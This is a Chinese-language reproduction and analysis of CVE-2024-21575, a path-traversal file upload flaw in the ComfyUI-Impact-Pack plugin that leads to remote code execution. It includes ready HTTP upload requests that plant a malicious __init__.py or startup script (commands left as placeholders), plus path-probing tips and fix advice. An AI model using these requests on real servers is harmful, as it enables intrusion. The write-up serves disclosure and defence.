ComfyUI-Impact-Pack插件RCE漏洞复现与分析 (CVE-2024-21575)<\/h1>

漏洞概述<\/h2>
ComfyUI-Impact-Pack插件存在一个任意文件上传漏洞(CVE-2024-21575)，可能导致远程代码执行(RCE)。该漏洞源于插件对上传文件路径处理不当，允许攻击者通过目录穿越实现任意文件上传。<\/p>
受影响版本<\/strong>：ComfyUI-Impact-Pack 7.6.2以下版本
修复方案<\/strong>：升级至ComfyUI-Impact-Pack 7.6.2或更高版本<\/p>

漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞位于impact_server.py<\/code>文件中，具体问题在于对上传文件的文件名参数(filename<\/code>)未做充分验证，导致可以构造包含路径遍历字符的文件名。<\/p>
漏洞利用条件<\/h3> 文件类型不受限制<\/li> 服务器会对同名文件自动重命名(如example (1).png<\/code>)<\/li> 无法直接创建自定义文件夹<\/li> 需要知道服务器上的部分路径信息<\/li> <\/ol> 关键限制<\/h3> 文件覆盖限制<\/strong>：无法直接覆盖现有文件，服务器会自动为重名文件添加序号后缀<\/li> 目录创建限制<\/strong>：无法直接创建自定义目录<\/li> <\/ul> 漏洞利用方法<\/h2> 方法一：利用custom_nodes目录<\/h3> 发现可利用目录<\/strong>：通过错误信息发现custom_nodes\/git<\/code>目录存在但缺少__init__.py<\/code>文件<\/p> 错误示例：Cannot import \/Users\/xxx\/comfy\/ComfyUI\/custom_nodes\/git module for custom nodes: [Errno 2] No such file or directory: '\/Users\/xxx\/comfy\/ComfyUI\/custom_nodes\/git\/__init__.py'<\/code><\/li> <\/ul> <\/li> 构造恶意文件上传<\/strong>：<\/p> 上传路径：..\/custom_nodes\/git\/__init__.py<\/code><\/li> 文件内容：包含恶意Python代码<\/li> <\/ul> <\/li> 触发执行<\/strong>：当插件重新加载时，会自动执行__init__.py<\/code>中的代码<\/p> <\/li> <\/ol> 方法二：利用ComfyUI-Manager的startup-scripts<\/h3> 发现可利用目录<\/strong>：user\/default\/ComfyUI-Manager\/startup-scripts\/<\/code><\/p> <\/li> 上传install-scripts.txt<\/strong>：<\/p> 上传路径：..\/user\/default\/ComfyUI-Manager\/startup-scripts\/install-scripts.txt<\/code><\/li> 文件内容：包含要执行的命令<\/li> <\/ul> <\/li> 触发执行<\/strong>：系统会根据install-scripts.txt<\/code>中的指令执行相应操作<\/p> <\/li> <\/ol> 路径探测技巧<\/h3> 当不清楚服务器上的确切路径时，可以通过以下方法探测：<\/p> 尝试上传到不同路径<\/li> 观察错误返回信息<\/li> 通过不断尝试和错误反馈逐步确定正确路径<\/li> <\/ol> 漏洞复现步骤<\/h2> 1. 确认任意文件上传<\/h3> 构造如下请求确认漏洞存在：<\/p> POST \/upload\/image HTTP\/1.1 Host: target.com Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="image"; filename="..\/test.txt" Content-Type: text\/plain test content ------WebKitFormBoundaryABC123-- <\/code><\/pre> 2. 实现RCE<\/h3> 通过custom_nodes方法：<\/h4> POST \/upload\/image HTTP\/1.1 Host: target.com Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="image"; filename="..\/custom_nodes\/git\/__init__.py" Content-Type: text\/plain import os os.system("恶意命令") ------WebKitFormBoundaryABC123-- <\/code><\/pre> 通过startup-scripts方法：<\/h4> POST \/upload\/image HTTP\/1.1 Host: target.com Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="image"; filename="..\/user\/default\/ComfyUI-Manager\/startup-scripts\/install-scripts.txt" Content-Type: text\/plain {"install": "", "uninstall": "", "pip": "恶意包或命令", "execute": "恶意命令"} ------WebKitFormBoundaryABC123-- <\/code><\/pre> 防御建议<\/h2> 及时升级<\/strong>：将ComfyUI-Impact-Pack升级至7.6.2或更高版本<\/li> 输入验证<\/strong>：对所有上传的文件名进行严格验证，过滤路径遍历字符<\/li> 文件隔离<\/strong>：将上传文件存储在非Web可访问目录<\/li> 权限控制<\/strong>：限制Web服务器的文件系统访问权限<\/li> 安全审计<\/strong>：定期审查自定义插件和节点的安全性<\/li> <\/ol> 总结<\/h2> 该漏洞通过组合文件上传和路径遍历缺陷，最终实现远程代码执行。虽然存在一些限制条件(如无法直接覆盖文件)，但通过巧妙利用系统自动加载机制和现有目录结构，攻击者仍能实现稳定的RCE。管理员应及时应用安全更新，并审查系统中其他可能存在类似问题的插件。<\/p>

ComfyUI-Impact-Pack插件RCE漏洞复现与分析 (CVE-2024-21575)<\/h1>

漏洞位置<\/h3> 漏洞位于impact_server.py<\/code>文件中，具体问题在于对上传文件的文件名参数(filename<\/code>)未做充分验证，导致可以构造包含路径遍历字符的文件名。<\/p>

漏洞利用方法<\/h2>

漏洞复现步骤<\/h2>

2. 实现RCE<\/h3>

漏洞位置<\/h3>
漏洞位于`impact_server.py<\/code>文件中，具体问题在于对上传文件的文件名参数(filename<\/code>)未做充分验证，导致可以构造包含路径遍历字符的文件名。<\/p>`